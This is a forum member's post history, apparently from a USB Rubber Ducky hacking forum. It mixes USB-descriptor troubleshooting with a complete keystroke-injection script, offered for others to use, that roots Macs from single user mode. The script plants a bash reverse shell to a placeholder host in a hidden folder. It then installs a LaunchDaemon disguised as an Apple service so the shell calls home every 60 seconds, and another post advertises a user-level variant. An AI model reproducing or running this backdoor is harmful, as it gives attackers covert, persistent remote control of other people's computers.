Jump to content

mosca1337

Active Members
  • Posts

    14
  • Joined

  • Last visited

Everything posted by mosca1337

  1. If I remember correctly, I think I tried something similar to this. I believe that once you catch the reverse shell and then close the session, the script is killed. Then you may not ever receive another reverse shell.
  2. If you catch a netcat shell, you should be able to navigate their file sysytem and download files.
  3. As requested, I made a modification to my root backdoor for OSX. This script will open a terminal from Spotlight and install a persistent reverse shell that will call home every 60 seconds. This will give you a user level shell for when you are unable or it is impossible to boot into single user mode. Change the domain/IP address to yours and catch with netcat: 'nc -l -p 1337' or 'nc -l 1337' on Macs. GUI - user payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-User-Backdoor Single user mode - root payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor Tutorial: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
  4. I had a lot of fun making it. Glad you like it!
  5. Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol) REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER
  6. Posted the script here: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor and tutorial here: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
  7. No, I'm just going crazy. I flashed back to v2 and then to your v2.1. It works!!!! It's funny how one bit can cause so much trouble haha. Thanks again for the help!
  8. Same results as the previous. I ran the command tail -c 2097152 duck_v2.1.hex | grep 0000010300 :1082D00009022200010100A032090400000103008C Those might represent the values: Interface #0 - 0x00 Alternate Setting - 0x00 Number of Endpoints - 0x01 Interface Class - 0x03 Interface Subclass - 0x00 Changing it to 0000010301 may work? I'm having a hard time figuring out how to find and replace in hex though.
  9. I found an article that may help: http://www.usb.org/developers/devclass_docs/HID1_11.pdf Page 18: Description of Subclass codes Bottom of page 77: bInterfaceSubClass - Offset/size (bytes) 6/1 - Boot Interface subclass - 0x01
  10. Does not work in regular or single user. This time the ducky is recognized as a "logitech" keyboard though. Device subclass: 1 Interface subclass: 0 Swap those two, and hopefully we'll get lucky.
  11. I think we're getting closer. It appears as though the "Device subclass" was changed to 1 instead of "Interface subclass". With the v2.1 hex, OSX doesn't recognize the ducky as a keyboard in regular or single user mode. Also, it appears as though the vidpin.bin is no longer read. The ducky appears to be an "Atmel Corporation" VIDPIN instead of the desired logitech VIDPIN. I attached a screenshot of the ducky with the new hex. Thanks!
  12. Also here are two screenshots of some debugging using Apple's USB Prober app. The device labeled "HID Keyboard" is the ducky that is imitating the VID and PID of the true logitech keyboard. The device labeled "USB Multimedia Keyboard" is the logitech keyboard. I noticed that towards the bottom there is a "Interface subclass". The ducky is 0 (false) and the logitech is 1 (Boot interface). I immediately correlate the words "single user mode" and "boot". I know nothing about USB devices, but could setting the value to 1 somehow make the ducky keyboard "visible" at startup in single user mode? Is there anyway to hardcode these Device Descriptors?
  13. Yes, single user mode is very limited. I do not believe that is the problem. I can plug any keyboard into any mac in single user mode, and they are all useable. So I created a vidpid.bin at the root of the SD card. I was able to change the VID and PID properly. On OSX, you can run: system_profiler SPUSBDataType Will give: HID Keyboard: Product ID: 0xc312 Vendor ID: 0x046d (Logitech Inc.) Version: 1.00 Speed: Up to 12 Mb/sec Manufacturer: ATMEL AVR Location ID: 0x06200000 / 4 Current Available (mA): 500 Current Required (mA): 100 This will give the VID and PID of all attached USB devices. I connected the working keyboard and copied the VID and PID over to the Ducky. Running the above command again, I was able to confirm that the Ducky had successfully cloned the VID and PID of the previously working keyboard. I also tried a handful of the VIDS and PIDS files available on google code. Still no luck. I flashed the ducky with duck_v2.hex and also osx.hex. I compiled a hello world script on Duck encoder V2.4. Again, the script works just fine on any computer, but isn't recognized in single user mode. I know this is possible because the ducky is a "keyboard", and keyboards work in single user mode. I know its possible!!! I appreciate the help btw
  14. Hey, I need some help debugging my new ducky. I've made some simple 'hello world' ducky scripts without any issues. They run on mac, windows, linux etc without any problems. I tried the same simple script in OSX's single user mode with no luck. It appears as though OSX in single user mode does not recognize the ducky as a keyboard? I tried increasing the string delay of the script so that it would type much slower. No luck. I have also tried plugging in external USB keyboards (such as my dell keyboard). Those are all recognized in single user mode. I tried the ducky on desktop Macs and MacBook Pros. Also no difference. Here is a test script: STRING_DELAY 50 DELAY 3000 STRING Hello World ENTER I'm really hoping that I am just making a small mistake. I've tried compiling my ducky script using 2.4, 3.0, and with the online tool. Again, any help would be appreciated! I have a real kickass script for quickly rooting Macs that I would like to share. Thanks!
×
×
  • Create New...